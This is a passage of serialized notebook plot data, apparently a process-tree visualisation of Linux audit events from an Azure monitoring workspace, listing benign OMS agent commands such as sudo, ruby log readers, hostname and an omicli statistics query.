VE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\",\"SYSCALL_EXECVE\"],\"Exe\":[\"unknown\",\"sudo\",\"ruby\",\"sudo\",\"test\",\"dash\",\"hostname\",\"dash\",\"hostname\",\"dash\",\"grep\",\"omicli\",\"sudo\",\"ruby\",\"sudo\",\"test\",\"sudo\",\"ruby\",\"sudo\",\"test\",\"sudo\",\"ruby\",\"sudo\",\"test\",\"sudo\",\"ruby\",\"sudo\",\"test\",\"sudo\",\"ruby\",\"sudo\",\"test\",\"sudo\",\"ruby\",\"sudo\",\"test\",\"sudo\",\"ruby\",\"sudo\",\"test\",\"sudo\",\"ruby\",\"sudo\",\"test\",\"sudo\",\"ruby\",\"sudo\",\"test\",\"sudo\",\"ruby\",\"sudo\",\"test\",\"sudo\",\"ruby\",\"sudo\",\"test\",\"sudo\",\"ruby\",\"sudo\",\"test\",\"sudo\",\"ruby\",\"sudo\",\"test\"],\"IsBranch\":[false,true,true,true,false,false,false,true,false,true,false,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,false,true,true,true,false],\"IsLeaf\":[false,false,false,false,true,true,true,false,true,false,true,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,true,false,false,false,true],\"IsRoot\":[true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false],\"Level\":[1,2,3,4,5,2,2,2,3,2,3,3,2,3,4,5,2,3,4,5,2,3,4,5,2,3,4,5,2,3,4,5,2,3,4,5,2,3,4,5,2,3,4,5,2,3,4,5,2,3,4,5,2,3,4,5,2,3,4,5,2,3,4,5],\"NewProcessId_par\":[\"NaN\",\"1350\",\"NaN\",\"NaN\",\"NaN\",\"1350\",\"1350\",\"1350\",\"NaN\",\"1350\",\"NaN\",\"NaN\",\"1350\",\"NaN\",\"NaN\",\"NaN\",\"1350\",\"NaN\",\"NaN\",\"NaN\",\"1350\",\"NaN\",\"NaN\",\"NaN\",\"1350\",\"NaN\",\"NaN\",\"NaN\",\"1350\",\"NaN\",\"NaN\",\"NaN\",\"1350\",\"NaN\",\"NaN\",\"NaN\",\"1350\",\"NaN\",\"NaN\",\"NaN\",\"1350\",\"NaN\",\"NaN\",\"NaN\",\"1350\",\"NaN\",\"NaN\",\"NaN\",\"1350\",\"NaN\",\"NaN\",\"NaN\",\"1350\",\"NaN\",\"NaN\",\"NaN\",\"1350\",\"NaN\",\"NaN\",\"NaN\",\"1350\",\"NaN\",\"NaN\",\"NaN\"],\"PID\":[\"PID: 0x546 (1350)\",\"PID: 0x6705 (26373)\",\"PID: 0x6707 (26375)\",\"PID: 0x6709 (26377)\",\"PID: 0x670a (26378)\",\"PID: 0x6a5b (27227)\",\"PID: 0x6a60 (27232)\",\"PID: 0x6a61 (27233)\",\"PID: 0x6a62 (27234)\",\"PID: 0x6a63 (27235)\",\"PID: 0x6a65 (27237)\",\"PID: 0x6a64 (27236)\",\"PID: 0x6a70 (27248)\",\"PID: 0x6a72 (27250)\",\"PID: 0x6a74 (27252)\",\"PID: 0x6a75 (27253)\",\"PID: 0x6ab9 (27321)\",\"PID: 0x6abb (27323)\",\"PID: 0x6abd (27325)\",\"PID: 0x6abe (27326)\",\"PID: 0x751d (29981)\",\"PID: 0x751f (29983)\",\"PID: 0x7521 (29985)\",\"PID: 0x7522 (29986)\",\"PID: 0x77cb (30667)\",\"PID: 0x77cd (30669)\",\"PID: 0x77cf (30671)\",\"PID: 0x77d0 (30672)\",\"PID: 0x6584 (25988)\",\"PID: 0x6586 (25990)\",\"PID: 0x6588 (25992)\",\"PID: 0x6589 (25993)\",\"PID: 0x2d2 (722)\",\"PID: 0x2d4 (724)\",\"PID: 0x2d6 (726)\",\"PID: 0x2d7 (727)\",\"PID: 0x31e (798)\",\"PID: 0x320 (800)\",\"PID: 0x322 (802)\",\"PID: 0x323 (803)\",\"PID: 0x58d (1421)\",\"PID: 0x58f (1423)\",\"PID: 0x591 (1425)\",\"PID: 0x592 (1426)\",\"PID: 0x5dd (1501)\",\"PID: 0x5df (1503)\",\"PID: 0x5e1 (1505)\",\"PID: 0x5e2 (1506)\",\"PID: 0xbf4 (3060)\",\"PID: 0xbf6 (3062)\",\"PID: 0xbf8 (3064)\",\"PID: 0xbf9 (3065)\",\"PID: 0xc44 (3140)\",\"PID: 0xc46 (3142)\",\"PID: 0xc48 (3144)\",\"PID: 0xc49 (3145)\",\"PID: 0x1b1e (6942)\",\"PID: 0x1b20 (6944)\",\"PID: 0x1b22 (6946)\",\"PID: 0x1b23 (6947)\",\"PID: 0x1b6d (7021)\",\"PID: 0x1b6f (7023)\",\"PID: 0x1b71 (7025)\",\"PID: 0x1b72 (7026)\"],\"ParentProcessName\":[\"NaN\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"unknown\",\"unknown\",\"/bin/dash\",\"unknown\",\"/bin/dash\",\"/bin/dash\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\"],\"Row\":[64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1],\"TenantId\":[\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\"],\"TimeGenerated\":{\"__ndarray__\":\"AAAAAAAAAAAAUAWn1492QgAQBqfXj3ZCABALp9ePdkIAEAyn1492QgCgczfYj3ZCAOAMOdiPdkIAIA052I92QgAgDTnYj3ZCAGANOdiPdkIAoA052I92QgCgDTnYj3ZCAODJOdiPdkIAYMo52I92QgCgzjnYj3ZCAGDPOdiPdkIAkHZI2I92QgAQd0jYj3ZCABB7SNiPdkIAkHtI2I92QgBADdXZj3ZCAAAO1dmPdkIAABLV2Y92QgCAEtXZj3ZCAHB0StqPdkIAMHVK2o92QgAweUraj3ZCALB5StqPdkIAwFBs1492QgCAUWzXj3ZCAMBVbNePdkIAQFZs1492QgAgBvTbj3ZCAOAG9NuPdkIAIAv02492QgDgC/Tbj3ZCABCzAtyPdkIA0LMC3I92QgDQtwLcj3ZCAFC4AtyPdkIAQG1p3I92QgAAbmncj3ZCAAByadyPdkIAgHJp3I92QgBwGXjcj3ZCADAaeNyPdkIAcB543I92QgAwH3jcj3ZCABAJRt2PdkIAkAlG3Y92QgDQDUbdj3ZCAFAORt2PdkIAgLVU3Y92QgBAtlTdj3ZCAIC6VN2PdkIAALtU3Y92QgCAatrfj3ZCAEBr2t+PdkIAgG/a3492QgAAcNrfj3ZCAEAX6d+PdkIAABjp3492QgAAHOnfj3ZCAIAc6d+PdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[64]},\"TimeGenerated_orig_par\":{\"__ndarray__\":\"/Knx0k1iQMMAAAAAAAAAAABQBafXj3ZCABAGp9ePdkIAEAun1492QgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgDTnYj3ZCAAAAAAAAAAAAYA052I92QgBgDTnYj3ZCAAAAAAAAAAAA4Mk52I92QgBgyjnYj3ZCAKDOOdiPdkIAAAAAAAAAAACQdkjYj3ZCABB3SNiPdkIAEHtI2I92QgAAAAAAAAAAAEAN1dmPdkIAAA7V2Y92QgAAEtXZj3ZCAAAAAAAAAAAAcHRK2o92QgAwdUraj3ZCADB5StqPdkIAAAAAAAAAAADAUGzXj3ZCAIBRbNePdkIAwFVs1492QgAAAAAAAAAAACAG9NuPdkIA4Ab02492QgAgC/Tbj3ZCAAAAAAAAAAAAELMC3I92QgDQswLcj3ZCANC3AtyPdkIAAAAAAAAAAABAbWncj3ZCAABuadyPdkIAAHJp3I92QgAAAAAAAAAAAHAZeNyPdkIAMBp43I92QgBwHnjcj3ZCAAAAAAAAAAAAEAlG3Y92QgCQCUbdj3ZCANANRt2PdkIAAAAAAAAAAACAtVTdj3ZCAEC2VN2PdkIAgLpU3Y92QgAAAAAAAAAAAIBq2t+PdkIAQGva3492QgCAb9rfj3ZCAAAAAAAAAAAAQBfp3492QgAAGOnfj3ZCAAAc6d+PdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[64]},\"a0\":[\"NaN\",\"sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"sudo\",\"test\",\"sh\",\"hostname\",\"sh\",\"hostname\",\"sh\",\"grep\",\"/opt/omi/bin/omicli\",\"sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"sudo\",\"test\",\"sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"sudo\",\"test\",\"sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"sudo\",\"test\",\"sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"sudo\",\"test\",\"sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"sudo\",\"test\",\"sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"sudo\",\"test\",\"sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"sudo\",\"test\",\"sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"sudo\",\"test\",\"sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"sudo\",\"test\",\"sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"sudo\",\"test\",\"sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"sudo\",\"test\",\"sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"sudo\",\"test\",\"sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"sudo\",\"test\"],\"a1\":[\"NaN\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"test\",\"-f\",\"-c\",\"NaN\",\"-c\",\"-d\",\"-c\",\"=\",\"wql\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"test\",\"-f\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"test\",\"-f\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"test\",\"-f\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"test\",\"-f\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"test\",\"-f\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"test\",\"-f\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"test\",\"-f\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"test\",\"-f\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"test\",\"-f\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"test\",\"-f\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"test\",\"-f\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"test\",\"-f\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"test\",\"-f\"],\"a2\":[\"NaN\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"/var/log/audit/audit.log\",\"-f\",\"/var/log/audit/audit.log\",\"echo > /dev/null\",\"NaN\",\"hostname -d 2> /dev/null\",\"NaN\",\"/opt/omi/bin/omicli wql root/scx \\\"SELECT PercentUserTime, PercentPrivilegedTime, UsedMemory, PercentUsedMemory FROM SCX_UnixProcessStatisticalInformation where Handle like '1350'\\\" | grep =\",\"NaN\",\"root/scx\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"/var/log/audit/audit.log\",\"-f\",\"/var/log/audit/audit.log\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"/var/log/audit/audit.log\",\"-f\",\"/var/log/audit/audit.log\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"/var/log/audit/audit.log\",\"-f\",\"/var/log/audit/audit.log\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"/var/log/audit/audit.log\",\"-f\",\"/var/log/audit/audit.log\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"/var/log/audit/audit.log\",\"-f\",\"/var/log/audit/audit.log\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"/var/log/audit/audit.log\",\"-f\",\"/var/log/audit/audit.log\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"/var/log/audit/audit.log\",\"-f\",\"/var/log/audit/audit.log\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"/var/log/audit/audit.log\",\"-f\",\"/var/log/audit/audit.log\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"/var/log/audit/audit.log\",\"-f\",\"/var/log/audit/audit.log\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"/var/log/audit/audit.log\",\"-f\",\"/var/log/audit/audit.log\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"/var/log/audit/audit.log\",\"-f\",\"/var/log/audit/audit.log\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"/var/log/audit/audit.log\",\"-f\",\"/var/log/audit/audit.log\",\"/opt/microsoft/omsagent/plugin/tailfilereader.rb\",\"/var/log/audit/audit.log\",\"-f\",\"/var/log/audit/audit.log\"],\"argc\":[\"NaN\",\"6\",\"5\",\"4\",\"3\",\"3\",\"1\",\"3\",\"2\",\"3\",\"2\",\"4\",\"6\",\"5\",\"4\",\"3\",\"6\",\"5\",\"4\",\"3\",\"6\",\"5\",\"4\",\"3\",\"6\",\"5\",\"4\",\"3\",\"6\",\"5\",\"4\",\"3\",\"6\",\"5\",\"4\",\"3\",\"6\",\"5\",\"4\",\"3\",\"6\",\"5\",\"4\",\"3\",\"6\",\"5\",\"4\",\"3\",\"6\",\"5\",\"4\",\"3\",\"6\",\"5\",\"4\",\"3\",\"6\",\"5\",\"4\",\"3\",\"6\",\"5\",\"4\",\"3\"],\"auid\":[\"NaN\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\"],\"cmd\":[\"cmdline unknown\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plu...\",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/t...\",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sh -c echo > /dev/null\",\"hostname\",\"sh -c hostname -d 2> /dev/null\",\"hostname -d\",\"sh -c /opt/omi/bin/omicli wql root/scx \\\"SELECT PercentUserTime, Percen...\",\"grep =\",\"/opt/omi/bin/omicli wql root/scx \",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plu...\",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/t...\",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plu...\",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/t...\",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plu...\",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/t...\",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plu...\",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/t...\",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plu...\",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/t...\",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plu...\",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/t...\",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plu...\",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/t...\",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plu...\",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/t...\",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plu...\",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/t...\",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plu...\",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/t...\",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plu...\",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/t...\",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plu...\",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/t...\",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plu...\",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/t...\",\"sudo test -f \",\"test -f /var/log/audit/audit.log\"],\"cmdline\":[\"NaN\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb \",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/audit/audit.log \",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sh -c echo > /dev/null\",\"hostname\",\"sh -c hostname -d 2> /dev/null\",\"hostname -d\",\"sh -c /opt/omi/bin/omicli wql root/scx \\\"SELECT PercentUserTime, PercentPrivilegedTime, UsedMemory, PercentUsedMemory FROM SCX_UnixProcessStatisticalInformation where Handle like '1350'\\\" | grep =\",\"grep =\",\"/opt/omi/bin/omicli wql root/scx \",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb \",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/audit/audit.log \",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb \",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/audit/audit.log \",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb \",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/audit/audit.log \",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb \",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/audit/audit.log \",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb \",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/audit/audit.log \",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb \",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/audit/audit.log \",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb \",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/audit/audit.log \",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb \",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/audit/audit.log \",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb \",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/audit/audit.log \",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb \",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/audit/audit.log \",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb \",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/audit/audit.log \",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb \",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/audit/audit.log \",\"sudo test -f \",\"test -f /var/log/audit/audit.log\",\"sudo /opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb \",\"/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/audit/audit.log \",\"sudo test -f \",\"test -f 